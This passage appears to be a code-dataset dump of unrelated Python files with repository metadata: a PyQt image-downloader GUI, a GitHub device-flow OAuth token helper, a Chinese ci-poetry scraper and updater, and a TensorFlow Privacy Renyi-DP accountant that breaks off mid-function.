self.update_timer.timeout.connect(self.update_elapsed_time)
self.process_log_timer = QTimer()
self.process_log_timer.setInterval(100)
self.process_log_timer.timeout.connect(self.progress_log)
self.process_log_timer.start()
self.pushButton_load_file.clicked.connect(
lambda: self.lineEdit_path2file.setText(QFileDialog.getOpenFileName(
self, "Load keywords from file", "./", "Text files (*.txt)")[0]))
self.pushButton_output.clicked.connect(
lambda: self.lineEdit_output.setText(QFileDialog.getExistingDirectory(
self, "Set output directory", "./")))
self.pushButton_start.clicked.connect(self.start_download)
self.pushButton_cancel.clicked.connect(self.cancel_download)
def log(self, text):
if text.strip(" \n") == "":
return
self.log_queue.append(text)
def progress_log(self):
while len(self.log_queue) > 0:
log_str = self.log_queue.pop(0)
if log_str.startswith("=="):
self.progressBar_current.setMaximum(int(log_str.split()[1]))
if log_str.startswith("##"):
self.progressBar_current.setValue(
self.progressBar_current.value() + 1)
log_str = "[" + QTime.currentTime().toString() + "] " + log_str
self.plainTextEdit_log.appendPlainText(log_str)
def reset_ui(self):
self.progressBar_current.setFormat("")
self.progressBar_current.reset()
self.progressBar_total.setFormat("")
self.progressBar_total.reset()
self.label_time_elapsed.setText("00:00:00")
self.plainTextEdit_log.clear()
def update_elapsed_time(self):
elapsed_total = self.elapsed_timer.elapsed() / 1000
elapsed_hour = elapsed_total / 3600
elapsed_minutes = (elapsed_total % 3600) / 60
elapsed_secs = elapsed_total % 60
str_elapsed_time = "%02d:%02d:%02d" % (
elapsed_hour, elapsed_minutes, elapsed_secs)
self.label_time_elapsed.setText(str_elapsed_time)
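# For example, an elapsed time of 3725 seconds is rendered as "01:02:05"
# (the "%02d" conversions truncate the float divisions toward zero).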
def gen_config_from_ui(self):
config = utils.AppConfig()
""" Driver """
if self.radioButton_chrome_headless.isChecked():
config.driver = "chrome_headless"
""" Output directory """
config.output_dir = self.lineEdit_output.text()
""" Switches """
config.face_only = self.checkBox_face_only.isChecked()
config.safe_mode = self.checkBox_safe_mode.isChecked()
""" Numbers """
config.max_number = self.spinBox_max_number.value()
config.num_threads = self.spinBox_num_threads.value()
""" Keywords List """
if self.checkBox_from_file.isChecked():
keywords_list = ''
str_path = ''
str_path = self.lineEdit_path2file.text()
#str_path = self.lineEdit_keywords.text()
if len(str_path) == 0:
messagebox.showinfo("Notice", "Please provide a keywords file to read")
self.close()
else:
keywords_list = utils.gen_keywords_list_from_file(str_path)
else:
# str_keywords = self.lineEdit_path2file.text()
str_keywords = self.lineEdit_keywords.text()
keywords_list = utils.gen_keywords_list_from_str(str_keywords)
return config, keywords_list
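# start_download (below) validates the keyword and output fields, then walks the
# keyword list, launching image_downloader.main in a worker Thread per keyword
# and polling it with QTest.qWait so the Qt event loop stays responsive.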
def start_download(self):
if self.checkBox_from_file.isChecked() and self.lineEdit_path2file.text() == "" \
or not self.checkBox_from_file.isChecked() and self.lineEdit_keywords.text() == "":
print("Keywords is empty!")
self.lineEdit_keywords.setFocus()
return
if self.lineEdit_output.text() == "":
print("Output directory is empty!")
self.lineEdit_output.setFocus()
return
self.state = "run"
self.pushButton_start.setEnabled(False)
self.pushButton_cancel.setEnabled(True)
config, keywords_list = self.gen_config_from_ui()
self.elapsed_timer.restart()
self.update_timer.start()
self.reset_ui()
num_keywords = len(keywords_list)
self.progressBar_total.setMaximum(num_keywords)
self.progressBar_total.setFormat("%p%, %v/%m")
self.progressBar_total.setValue(0)
for index in range(num_keywords):
if self.state != "run":
break
keywords = keywords_list[index].strip()
if keywords == "":
continue
config.keywords = keywords
str_paras = config.to_command_paras()
print(str_paras)
self.progressBar_current.setMaximum(config.max_number)
self.progressBar_current.setValue(0)
self.progressBar_current.setFormat(keywords + ", %p%, %v/%m")
thread_download = Thread(target=image_downloader.main, args=[
shlex.split(str_paras)])
thread_download.start()
while thread_download.is_alive():
QTest.qWait(1000)
if self.isHidden():
os._exit(0)
self.progressBar_total.setValue(index + 1)
if self.state == "run":
self.state = "stop"
self.pushButton_cancel.setEnabled(False)
self.pushButton_start.setEnabled(True)
self.update_timer.stop()
print("stopped")
pass
def cancel_download(self):
self.state = "stop"
self.pushButton_cancel.setEnabled(False)
pass
| 32.826531
| 99
| 0.617345
|
8d7294bb7a717ca92590937bf21dec0a3ba356e0
| 156
|
py
|
Python
|
arch_elements/model_def/__init__.py
|
martsec/arcitectural_elements_identifier
|
87607e87f714443c5aa37c96896b76a4f6f424d4
|
[
"AAL"
] | null | null | null |
arch_elements/model_def/__init__.py
|
martsec/arcitectural_elements_identifier
|
87607e87f714443c5aa37c96896b76a4f6f424d4
|
[
"AAL"
] | null | null | null |
arch_elements/model_def/__init__.py
|
martsec/arcitectural_elements_identifier
|
87607e87f714443c5aa37c96896b76a4f6f424d4
|
[
"AAL"
] | null | null | null |
from .mobilenet import Mobilenet
from .cnn import CNN
from .svm import SVMClassifier
__all__ = [
"Mobilenet",
"CNN",
"SVMClassifier",
]
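# Illustrative import (constructor arguments depend on each class):
#   from arch_elements.model_def import Mobilenet, CNN, SVMClassifier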
| 17.333333
| 33
| 0.653846
|
60573010333516771d53c2e0c6a36c55e4898b93
| 1,762
|
py
|
Python
|
pygisty/gisty/headless.py
|
BlyatManGopnik/pygisty
|
e9ba1b41e6c873cf3ce7bb449d119669940a767b
|
[
"MIT"
] | 1
|
2022-03-26T06:46:01.000Z
|
2022-03-26T06:46:01.000Z
|
pygisty/gisty/headless.py
|
Amedlio/pygisty
|
dfb7f624b3bba0a3972bd01eac297dcb23e17181
|
[
"MIT"
] | 1
|
2022-03-26T08:10:34.000Z
|
2022-03-26T08:12:15.000Z
|
pygisty/gisty/headless.py
|
Amedlio/pygisty
|
dfb7f624b3bba0a3972bd01eac297dcb23e17181
|
[
"MIT"
] | 1
|
2022-03-26T06:30:40.000Z
|
2022-03-26T06:30:40.000Z
|
import requests
import json
import time
def headless(clientid, configdir):
global authtoken
global headlessdone
global devicecode
headlessdone = False
print(clientid)
print("Starting headless GitHub authentication")
pog = {"client_id": clientid, "scope": "gist"}
header = {'User-Agent': "pygisty", "Accept": "application/json"}
r = requests.Session()
r.params.update(pog)
r.headers.update(header)
request = r.post('https://github.com/login/device/code')
body = request.text
dat = json.loads(body)
try:
error = dat["error"]
print("Error: " + error)
print(request.url)
except KeyError:
devicecode = dat["device_code"]
print("I just received a code that you should enter at https://github.com/login/device\nCode: " + dat[
"user_code"])
while not headlessdone:
try:
poggers = {"client_id": clientid, "device_code": devicecode,
"grant_type": "urn:ietf:params:oauth:grant-type:device_code"}
s = requests.Session()
s.params.update(poggers)
s.headers.update(header)
pogchamp = s.post("https://github.com/login/oauth/access_token")
data = json.loads(pogchamp.text)
authtoken = data["access_token"]
print("We got the auth token!")
accessjson = {
"access_token": authtoken
}
with open(configdir+"/access_token.json", "w") as configfile:
json.dump(accessjson, configfile)
headlessdone = True
except KeyError:
time.sleep(5)
return authtoken
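# Illustrative call (the client id and config directory are placeholders):
#   token = headless("your_github_oauth_client_id", "/path/to/configdir")
# The function blocks, polling GitHub every 5 seconds until the device code is
# authorized, then caches the token in <configdir>/access_token.json.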
| 35.959184
| 110
| 0.568672
|
8f4b5933201e7fa3723c7fc51b1f9bea5f0fc838
| 4,289
|
py
|
Python
|
ci/UpdateCi.py
|
WOCyo/chinese-poetry
|
88ac4a5104c9435fbf172b9b25f4200654c2a237
|
[
"MIT"
] | 1
|
2022-03-21T14:04:31.000Z
|
2022-03-21T14:04:31.000Z
|
ci/UpdateCi.py
|
WOCyo/chinese-poetry
|
88ac4a5104c9435fbf172b9b25f4200654c2a237
|
[
"MIT"
] | null | null | null |
ci/UpdateCi.py
|
WOCyo/chinese-poetry
|
88ac4a5104c9435fbf172b9b25f4200654c2a237
|
[
"MIT"
] | null | null | null |
import json
import logging
import os
import re
from difflib import SequenceMatcher
import requests
from bs4 import BeautifulSoup
from bs4.element import NavigableString
def get_page_content(page: int) -> list:
""" 获取目录页每一页的内容 """
content = []
r = requests.post("http://qsc.zww.cn/getdata.asp", data={
"seektype": 2,
"seekvalue": "",
"pageno": page
})
r.encoding = "gbk"
soup = BeautifulSoup(re.search(r"filllist\('·(.*?)'\);", r.text).group(1), features="lxml")
for i, a in enumerate(soup.find_all(name="a")):
if i % 2 == 0:
content.append({
"rhythmic": a.string.split("(")[0],
"param": re.search(r"doseek2\((.*?)\);", a["onclick"]).group(1).split(",")
})
else:
content[-1]["author"] = a.string
for c in content:
c["paragraphs"] = get_paragraphs(int(c["param"][0]), int(c["param"][1]))
del c["param"]
return content
def get_paragraphs(seek_type: int, seek_value: int) -> list:
""" 获取词的内容段落 """
paragraphs = []
r = requests.post("http://qsc.zww.cn/getdata.asp", data={
"seektype": seek_type,
"seekvalue": seek_value,
"pageno": 1
})
r.encoding = "gbk"
soup = BeautifulSoup(re.search(r"fillbody\('(.*?)'\);", r.text).group(1), features="lxml")
for child in soup.find(name="p", align=None).contents:
if isinstance(child, NavigableString):
paragraphs.append(child)
return paragraphs
def get_all_page(temp_file: str):
""" 爬取数据并保存至临时文件 """
for page in range(1, 1240):
all_data.extend(get_page_content(page))
logging.info("Success: save page {0}".format(page))
with open(temp_file, "w", encoding="utf-8") as f:
f.write(json.dumps(all_data, indent=2, ensure_ascii=False))
def only_text(text: str):
""" 去除标点只保留文字 """
return re.sub(r"[,。、《》…()·・\s]", "", text)
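# For example, only_text("一蓑烟雨,任平生。") returns "一蓑烟雨任平生".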
def update_file_data(old_data: list, new_data: list):
for i in range(len(old_data)):
old_text = only_text("".join(old_data[i]["paragraphs"]))
new_text = only_text("".join(new_data[start + i]["paragraphs"]))
# Compute the similarity of the plain text
ratio = SequenceMatcher(a=old_text, b=new_text).quick_ratio()
if 0.9 <= ratio < 1.0:
# Assume this range indicates missing characters, so the entry needs updating
old_data[i]["author"] = new_data[start + i]["author"]
old_data[i]["paragraphs"] = new_data[start + i]["paragraphs"]
elif ratio < 0.9:
# Abnormal case: log a warning and do not update
logging.warning(old_text)
logging.warning(new_text)
else:
old_data[i]["author"] = new_data[start + i]["author"]
char_dict = {
"鵷": "鹓",
"颭": "飐",
"鷁": "鹢",
"鴞": "鸮",
"餖": "饾",
"飣": "饤",
"舃": "舄",
"駸": "骎",
"薄倖": "薄幸",
"赬": "赪",
"鷫鸘": "鹔鹴",
"嶮": "崄",
"後": "后",
"纇": "颣",
"颸": "飔",
"崑崙": "昆仑",
"曨": "昽"
}
def correct(old_data: list):
""" 部分繁体转为简体 """
for i in range(len(old_data)):
for j in range(len(old_data[i]["paragraphs"])):
for k, v in char_dict.items():
if k in old_data[i]["paragraphs"][j]:
old_data[i]["paragraphs"][j] = old_data[i]["paragraphs"][j].replace(k, v)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO,
format="%(asctime)s - %(levelname)-9s %(filename)-15s[:%(lineno)d]\t%(message)s")
temp_file_name = "all.json"
# Crawl the data first if the temporary file does not exist
if not os.path.exists(temp_file_name):
get_all_page(temp_file_name)
# Read the temporary file
with open("all.json", "r", encoding="utf-8") as f:
all_data = json.load(f)
# Iterate over the current directory
for file_name in os.listdir("./"):
if re.match(r"ci\.song\.\d+\.json", file_name):
# Index into the data where each file's entries start
start = int(file_name.split(".")[2])
with open(file_name, "r", encoding="utf-8") as f:
file_data = json.load(f)
update_file_data(file_data, all_data)
correct(file_data)
# Save the data; the original files put a space after commas, so stay consistent with that
with open(file_name, "w", encoding="utf-8") as f:
f.write(json.dumps(file_data, indent=2, ensure_ascii=False).replace(",", ", "))
logging.info("Save " + file_name)
| 31.306569
| 105
| 0.547214
|
674fd21e8889269802d5c0a2d62bbc6b4828db29
| 20,608
|
py
|
Python
|
tensorflow_privacy/privacy/analysis/rdp_privacy_accountant.py
|
andrewyguo/privacy
|
a33afde0c105ece6c48b17a80f13899cf3e7c1b3
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_privacy/privacy/analysis/rdp_privacy_accountant.py
|
andrewyguo/privacy
|
a33afde0c105ece6c48b17a80f13899cf3e7c1b3
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_privacy/privacy/analysis/rdp_privacy_accountant.py
|
andrewyguo/privacy
|
a33afde0c105ece6c48b17a80f13899cf3e7c1b3
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Privacy accountant that uses Renyi differential privacy."""
import math
from typing import Collection, Optional
import numpy as np
from scipy import special
from tensorflow_privacy.privacy.analysis import dp_event
from tensorflow_privacy.privacy.analysis import privacy_accountant
NeighborRel = privacy_accountant.NeighboringRelation
def _log_add(logx, logy):
"""Adds two numbers in the log space."""
a, b = min(logx, logy), max(logx, logy)
if a == -np.inf: # adding 0
return b
# Use exp(a) + exp(b) = (exp(a - b) + 1) * exp(b)
return math.log1p(math.exp(a - b)) + b # log1p(x) = log(x + 1)
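# For example, _log_add(math.log(2), math.log(3)) equals math.log(5) up to
# floating-point error, since exp(log 2) + exp(log 3) = 5.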
def _log_sub(logx, logy):
"""Subtracts two numbers in the log space. Answer must be non-negative."""
if logx < logy:
raise ValueError('The result of subtraction must be non-negative.')
if logy == -np.inf: # subtracting 0
return logx
if logx == logy:
return -np.inf # 0 is represented as -np.inf in the log space.
try:
# Use exp(x) - exp(y) = (exp(x - y) - 1) * exp(y).
return math.log(math.expm1(logx - logy)) + logy # expm1(x) = exp(x) - 1
except OverflowError:
return logx
def _log_sub_sign(logx, logy):
"""Returns log(exp(logx)-exp(logy)) and its sign."""
if logx > logy:
s = True
mag = logx + np.log(1 - np.exp(logy - logx))
elif logx < logy:
s = False
mag = logy + np.log(1 - np.exp(logx - logy))
else:
s = True
mag = -np.inf
return s, mag
def _log_comb(n, k):
"""Computes log of binomial coefficient."""
return (special.gammaln(n + 1) - special.gammaln(k + 1) -
special.gammaln(n - k + 1))
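# For example, _log_comb(5, 2) equals math.log(10), since C(5, 2) = 10.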
def _compute_log_a_int(q, sigma, alpha):
"""Computes log(A_alpha) for integer alpha, 0 < q < 1."""
assert isinstance(alpha, int)
# Initialize with 0 in the log space.
log_a = -np.inf
for i in range(alpha + 1):
log_coef_i = (
_log_comb(alpha, i) + i * math.log(q) + (alpha - i) * math.log(1 - q))
s = log_coef_i + (i * i - i) / (2 * (sigma**2))
log_a = _log_add(log_a, s)
return float(log_a)
def _compute_log_a_frac(q, sigma, alpha):
"""Computes log(A_alpha) for fractional alpha, 0 < q < 1."""
# The two parts of A_alpha, integrals over (-inf,z0] and [z0, +inf), are
# initialized to 0 in the log space:
log_a0, log_a1 = -np.inf, -np.inf
i = 0
z0 = sigma**2 * math.log(1 / q - 1) + .5
while True: # do ... until loop
coef = special.binom(alpha, i)
log_coef = math.log(abs(coef))
j = alpha - i
log_t0 = log_coef + i * math.log(q) + j * math.log(1 - q)
log_t1 = log_coef + j * math.log(q) + i * math.log(1 - q)
log_e0 = math.log(.5) + _log_erfc((i - z0) / (math.sqrt(2) * sigma))
log_e1 = math.log(.5) + _log_erfc((z0 - j) / (math.sqrt(2) * sigma))
log_s0 = log_t0 + (i * i - i) / (2 * (sigma**2)) + log_e0
log_s1 = log_t1 + (j * j - j) / (2 * (sigma**2)) + log_e1
if coef > 0:
log_a0 = _log_add(log_a0, log_s0)
log_a1 = _log_add(log_a1, log_s1)
else:
log_a0 = _log_sub(log_a0, log_s0)
log_a1 = _log_sub(log_a1, log_s1)
i += 1
if max(log_s0, log_s1) < -30:
break
return _log_add(log_a0, log_a1)
def _log_erfc(x):
"""Computes log(erfc(x)) with high accuracy for large x."""
try:
return math.log(2) + special.log_ndtr(-x * 2**.5)
except NameError:
# If log_ndtr is not available, approximate as follows:
r = special.erfc(x)
if r == 0.0:
# Using the Laurent series at infinity for the tail of the erfc function:
# erfc(x) ~ exp(-x^2-.5/x^2+.625/x^4)/(x*pi^.5)
# To verify in Mathematica:
# Series[Log[Erfc[x]] + Log[x] + Log[Pi]/2 + x^2, {x, Infinity, 6}]
return (-math.log(math.pi) / 2 - math.log(x) - x**2 - .5 * x**-2 +
.625 * x**-4 - 37. / 24. * x**-6 + 353. / 64. * x**-8)
else:
return math.log(r)
def _compute_delta(orders, rdp, epsilon):
"""Compute delta given a list of RDP values and target epsilon.
Args:
orders: An array of orders.
rdp: An array of RDP guarantees.
epsilon: The target epsilon.
Returns:
Optimal delta.
Raises:
ValueError: If input is malformed.
"""
if epsilon < 0:
raise ValueError(f'Epsilon cannot be negative. Found {epsilon}.')
if len(orders) != len(rdp):
raise ValueError('Input lists must have the same length.')
# Basic bound (see https://arxiv.org/abs/1702.07476 Proposition 3 in v3):
# delta = min( np.exp((rdp - epsilon) * (orders - 1)) )
# Improved bound from https://arxiv.org/abs/2004.00010 Proposition 12 (in v4):
logdeltas = [] # work in log space to avoid overflows
for (a, r) in zip(orders, rdp):
if a < 1:
raise ValueError(f'Renyi divergence order must be at least 1. Found {a}.')
if r < 0:
raise ValueError(f'Renyi divergence cannot be negative. Found {r}.')
# For small alpha, we are better off with the bound via KL divergence:
# delta <= sqrt(1-exp(-KL)).
# Take a min of the two bounds.
if r == 0:
logdelta = -np.inf
else:
logdelta = 0.5 * math.log1p(-math.exp(-r))
if a > 1.01:
# This bound is not numerically stable as alpha->1.
# Thus we have a min value for alpha.
# The bound is also not useful for small alpha, so doesn't matter.
rdp_bound = (a - 1) * (r - epsilon + math.log1p(-1 / a)) - math.log(a)
logdelta = min(logdelta, rdp_bound)
logdeltas.append(logdelta)
return min(math.exp(np.min(logdeltas)), 1.)
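# Illustrative call (values are arbitrary): _compute_delta([2.0, 8.0],
# [0.5, 1.2], epsilon=1.0) returns the smallest delta achievable across the
# two orders, capped at 1.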
def _compute_epsilon(orders, rdp, delta):
"""Compute epsilon given a list of RDP values and target delta.
Args:
orders: An array of orders.
rdp: An array of RDP guarantees.
delta: The target delta. Must be >= 0.
Returns:
Optimal epsilon.
Raises:
ValueError: If input is malformed.
"""
if delta < 0:
raise ValueError(f'Delta cannot be negative. Found {delta}.')
if delta == 0:
if all(r == 0 for r in rdp):
return 0
else:
return np.inf
if len(orders) != len(rdp):
raise ValueError('Input lists must have the same length.')
# Basic bound (see https://arxiv.org/abs/1702.07476 Proposition 3 in v3):
# epsilon = min( rdp - math.log(delta) / (orders - 1) )
# Improved bound from https://arxiv.org/abs/2004.00010 Proposition 12 (in v4).
# Also appears in https://arxiv.org/abs/2001.05990 Equation 20 (in v1).
eps = []
for (a, r) in zip(orders, rdp):
if a < 1:
raise ValueError(f'Renyi divergence order must be at least 1. Found {a}.')
if r < 0:
raise ValueError(f'Renyi divergence cannot be negative. Found {r}.')
if delta**2 + math.expm1(-r) > 0:
# In this case, we can simply bound via KL divergence:
# delta <= sqrt(1-exp(-KL)).
epsilon = 0 # No need to try further computation if we have epsilon = 0.
elif a > 1.01:
# This bound is not numerically stable as alpha->1.
# Thus we have a min value of alpha.
# The bound is also not useful for small alpha, so doesn't matter.
epsilon = r + math.log1p(-1 / a) - math.log(delta * a) / (a - 1)
else:
# In this case we can't do anything. E.g., asking for delta = 0.
epsilon = np.inf
eps.append(epsilon)
return max(0, np.min(eps))
def _stable_inplace_diff_in_log(vec, signs, n=-1):
"""Replaces the first n-1 dims of vec with the log of abs difference operator.
Args:
vec: numpy array of floats with size larger than 'n'
signs: Optional numpy array of bools with the same size as vec in case one
needs to compute partial differences vec and signs jointly describe a
vector of real numbers' sign and abs in log scale.
n: Optional upper bound on the number of differences to compute. If negative, all
differences are computed.
Returns:
The first n-1 dimension of vec and signs will store the log-abs and sign of
the difference.
Raises:
ValueError: If input is malformed.
"""
assert vec.shape == signs.shape
if n < 0:
n = np.max(vec.shape) - 1
else:
assert np.max(vec.shape) >= n + 1
for j in range(0, n, 1):
if signs[j] == signs[j + 1]: # When the signs are the same
# if the signs are both positive, then we can just use the standard one
signs[j], vec[j] = _log_sub_sign(vec[j + 1], vec[j])
# otherwise, we do that but toggle the sign
if not signs[j + 1]:
signs[j] = ~signs[j]
else: # When the signs are different.
vec[j] = _log_add(vec[j], vec[j + 1])
signs[j] = signs[j + 1]
def _get_forward_diffs(fun, n):
"""Computes up to nth order forward difference evaluated at 0.
See Theorem 27 of https://arxiv.org/pdf/1808.00087.pdf
Args:
fun: Function to compute forward differences of.
n: Number of differences to compute.
Returns:
Pair (deltas, signs_deltas) of the log deltas and their signs.
"""
func_vec = np.zeros(n + 3)
signs_func_vec = np.ones(n + 3, dtype=bool)
# ith coordinate of deltas stores log(abs(ith order discrete derivative))
deltas = np.zeros(n + 2)
signs_deltas = np.zeros(n + 2, dtype=bool)
for i in range(1, n + 3, 1):
func_vec[i] = fun(1.0 * (i - 1))
for i in range(0, n + 2, 1):
# Diff in log scale
_stable_inplace_diff_in_log(func_vec, signs_func_vec, n=n + 2 - i)
deltas[i] = func_vec[0]
signs_deltas[i] = signs_func_vec[0]
return deltas, signs_deltas
def _compute_log_a(q, noise_multiplier, alpha):
if float(alpha).is_integer():
return _compute_log_a_int(q, noise_multiplier, int(alpha))
else:
return _compute_log_a_frac(q, noise_multiplier, alpha)
def _compute_rdp_poisson_subsampled_gaussian(q, noise_multiplier, orders):
"""Computes RDP of the Poisson sampled Gaussian mechanism.
Args:
q: The sampling rate.
noise_multiplier: The ratio of the standard deviation of the Gaussian noise
to the l2-sensitivity of the function to which it is added.
orders: An array of RDP orders.
Returns:
The RDPs at all orders. Can be `np.inf`.
"""
def compute_one_order(q, alpha):
if np.isinf(alpha) or noise_multiplier == 0:
return np.inf
if q == 0:
return 0
if q == 1.:
return alpha / (2 * noise_multiplier**2)
return _compute_log_a(q, noise_multiplier, alpha) / (alpha - 1)
return np.array([compute_one_order(q, order) for order in orders])
def _compute_rdp_sample_wor_gaussian(q, noise_multiplier, orders):
"""Computes RDP of Gaussian mechanism using sampling without replacement.
This function applies to the following schemes:
1. Sampling w/o replacement: Sample a uniformly random subset of size m = q*n.
2. ``Replace one data point'' version of differential privacy, i.e., n is
considered public information.
Reference: Theorem 27 of https://arxiv.org/pdf/1808.00087.pdf (A strengthened
version applies subsampled-Gaussian mechanism.)
- Wang, Balle, Kasiviswanathan. "Subsampled Renyi Differential Privacy and
Analytical Moments Accountant." AISTATS'2019.
Args:
q: The sampling proportion = m / n. Assume m is an integer <= n.
noise_multiplier: The ratio of the standard deviation of the Gaussian noise
to the l2-sensitivity of the function to which it is added.
orders: An array of RDP orders.
Returns:
The RDPs at all orders, can be np.inf.
"""
return np.array([
_compute_rdp_sample_wor_gaussian_scalar(q, noise_multiplier, order)
for order in orders
])
def _compute_rdp_sample_wor_gaussian_scalar(q, sigma, alpha):
"""Compute RDP of the Sampled Gaussian mechanism at order alpha.
Args:
q: The sampling proportion = m / n. Assume m is an integer <= n.
sigma: The std of the additive Gaussian noise.
alpha: The order at which RDP is computed.
Returns:
RDP at alpha, can be np.inf.
"""
assert (q <= 1) and (q >= 0) and (alpha >= 1)
if q == 0:
return 0
if q == 1.:
return alpha / (2 * sigma**2)
if np.isinf(alpha):
return np.inf
if float(alpha).is_integer():
return _compute_rdp_sample_wor_gaussian_int(q, sigma, int(alpha)) / (
alpha - 1)
else:
# When alpha not an integer, we apply Corollary 10 of [WBK19] to interpolate
# the CGF and obtain an upper bound
alpha_f = math.floor(alpha)
alpha_c = math.ceil(alpha)
x = _compute_rdp_sample_wor_gaussian_int(q, sigma, alpha_f)
y = _compute_rdp_sample_wor_gaussian_int(q, sigma, alpha_c)
t = alpha - alpha_f
return ((1 - t) * x + t * y) / (alpha - 1)
def _compute_rdp_sample_wor_gaussian_int(q, sigma, alpha):
"""Compute log(A_alpha) for integer alpha, subsampling without replacement.
When alpha is smaller than max_alpha, compute the bound Theorem 27 exactly,
otherwise compute the bound with Stirling approximation.
Args:
q: The sampling proportion = m / n. Assume m is an integer <= n.
sigma: The std of the additive Gaussian noise.
alpha: The order at which RDP is computed.
Returns:
RDP at alpha, can be np.inf.
"""
max_alpha = 256
assert isinstance(alpha, int)
if np.isinf(alpha):
return np.inf
elif alpha == 1:
return 0
def cgf(x):
# Return rdp(x+1)*x, the rdp of Gaussian mechanism is alpha/(2*sigma**2)
return x * 1.0 * (x + 1) / (2.0 * sigma**2)
def func(x):
# Return the rdp of Gaussian mechanism
return 1.0 * x / (2.0 * sigma**2)
# Initialize with 1 in the log space.
log_a = 0
# Calculates the log term when alpha = 2
log_f2m1 = func(2.0) + np.log(1 - np.exp(-func(2.0)))
if alpha <= max_alpha:
# We need forward differences of exp(cgf)
# The following line is the numerically stable way of implementing it.
# The output is in polar form with logarithmic magnitude
deltas, _ = _get_forward_diffs(cgf, alpha)
# Compute the bound exactly requires book keeping of O(alpha**2)
for i in range(2, alpha + 1):
if i == 2:
s = 2 * np.log(q) + _log_comb(alpha, 2) + np.minimum(
np.log(4) + log_f2m1,
func(2.0) + np.log(2))
elif i > 2:
delta_lo = deltas[int(2 * np.floor(i / 2.0)) - 1]
delta_hi = deltas[int(2 * np.ceil(i / 2.0)) - 1]
s = np.log(4) + 0.5 * (delta_lo + delta_hi)
s = np.minimum(s, np.log(2) + cgf(i - 1))
s += i * np.log(q) + _log_comb(alpha, i)
log_a = _log_add(log_a, s)
return float(log_a)
else:
# Compute the bound with stirling approximation. Everything is O(x) now.
for i in range(2, alpha + 1):
if i == 2:
s = 2 * np.log(q) + _log_comb(alpha, 2) + np.minimum(
np.log(4) + log_f2m1,
func(2.0) + np.log(2))
else:
s = np.log(2) + cgf(i - 1) + i * np.log(q) + _log_comb(alpha, i)
log_a = _log_add(log_a, s)
return log_a
def _effective_gaussian_noise_multiplier(event: dp_event.DpEvent):
"""Determines the effective noise multiplier of nested structure of Gaussians.
A series of Gaussian queries on the same data can be reexpressed as a single
query with pre- and post- processing. For details, see section 3 of
https://arxiv.org/pdf/1812.06210.pdf.
Args:
event: A `dp_event.DpEvent`. In order for conversion to be successful it
must consist of a single `dp_event.GaussianDpEvent`, or a nested structure
of `dp_event.ComposedDpEvent` and/or `dp_event.SelfComposedDpEvent`
bottoming out in `dp_event.GaussianDpEvent`s.
Returns:
The noise multiplier of the equivalent `dp_event.GaussianDpEvent`, or None
if the input event was not a `dp_event.GaussianDpEvent` or a nested
structure of `dp_event.ComposedDpEvent` and/or
`dp_event.SelfComposedDpEvent` bottoming out in `dp_event.GaussianDpEvent`s.
"""
if isinstance(event, dp_event.GaussianDpEvent):
return event.noise_multiplier
elif isinstance(event, dp_event.ComposedDpEvent):
sum_sigma_inv_sq = 0
for e in event.events:
sigma = _effective_gaussian_noise_multiplier(e)
if sigma is None:
return None
sum_sigma_inv_sq += sigma**-2
return sum_sigma_inv_sq**-0.5
elif isinstance(event, dp_event.SelfComposedDpEvent):
sigma = _effective_gaussian_noise_multiplier(event.event)
return None if sigma is None else (event.count * sigma**-2)**-0.5
else:
return None
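# For example, a ComposedDpEvent of two GaussianDpEvents with noise
# multipliers 1.0 and 1.0 is equivalent to a single Gaussian with
# 1 / sqrt(1/1**2 + 1/1**2) = 2**-0.5 ~= 0.707.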
class RdpAccountant(privacy_accountant.PrivacyAccountant):
"""Privacy accountant that uses Renyi differential privacy."""
def __init__(
self,
orders: Optional[Collection[float]] = None,
neighboring_relation: NeighborRel = NeighborRel.ADD_OR_REMOVE_ONE,
):
super().__init__(neighboring_relation)
if orders is None:
# Default orders chosen to give good coverage for Gaussian mechanism in
# the privacy regime of interest. In the future, more orders might be
# added, in particular, fractional orders between 1.0 and 10.0 or so.
orders = [
2, 3, 4, 5, 6, 7, 8, 9, 10, 12, 14, 16, 20, 24, 28, 32, 48, 64, 128,
256, 512, 1024
]
self._orders = np.array(orders)
self._rdp = np.zeros_like(orders, dtype=np.float64)
def supports(self, event: dp_event.DpEvent) -> bool:
return self._maybe_compose(event, 0, False)
def _compose(self, event: dp_event.DpEvent, count: int = 1):
self._maybe_compose(event, count, True)
def _maybe_compose(self, event: dp_event.DpEvent, count: int,
do_compose: bool) -> bool:
"""Traverses `event` and performs composition if `do_compose` is True.
If `do_compose` is False, can be used to check whether composition is
supported.
Args:
event: A `DpEvent` to process.
count: The number of times to compose the event.
do_compose: Whether to actually perform the composition.
Returns:
True if event is supported, otherwise False.
"""
if isinstance(event, dp_event.NoOpDpEvent):
return True
elif isinstance(event, dp_event.NonPrivateDpEvent):
if do_compose:
self._rdp += np.inf
return True
elif isinstance(event, dp_event.SelfComposedDpEvent):
return self._maybe_compose(event.event, event.count * count, do_compose)
elif isinstance(event, dp_event.ComposedDpEvent):
return all(
self._maybe_compose(e, count, do_compose) for e in event.events)
elif isinstance(event, dp_event.GaussianDpEvent):
if do_compose:
self._rdp += count * _compute_rdp_poisson_subsampled_gaussian(
q=1.0, noise_multiplier=event.noise_multiplier, orders=self._orders)
return True
elif isinstance(event, dp_event.PoissonSampledDpEvent):
if self._neighboring_relation is not NeighborRel.ADD_OR_REMOVE_ONE:
return False
gaussian_noise_multiplier = _effective_gaussian_noise_multiplier(
event.event)
if gaussian_noise_multiplier is None:
return False
if do_compose:
self._rdp += count * _compute_rdp_poisson_subsampled_gaussian(
q=event.sampling_probability,
noise_multiplier=gaussian_noise_multiplier,
orders=self._orders)
return True
elif isinstance(event, dp_event.SampledWithoutReplacementDpEvent):
if self._neighboring_relation is not NeighborRel.REPLACE_ONE:
return False
gaussian_noise_multiplier = _effective_gaussian_noise_multiplier(
event.event)
if gaussian_noise_multiplier is None:
return False
if do_compose:
self._rdp += count * _compute_rdp_sample_wor_gaussian(
q=event.sample_size / event.source_dataset_size,
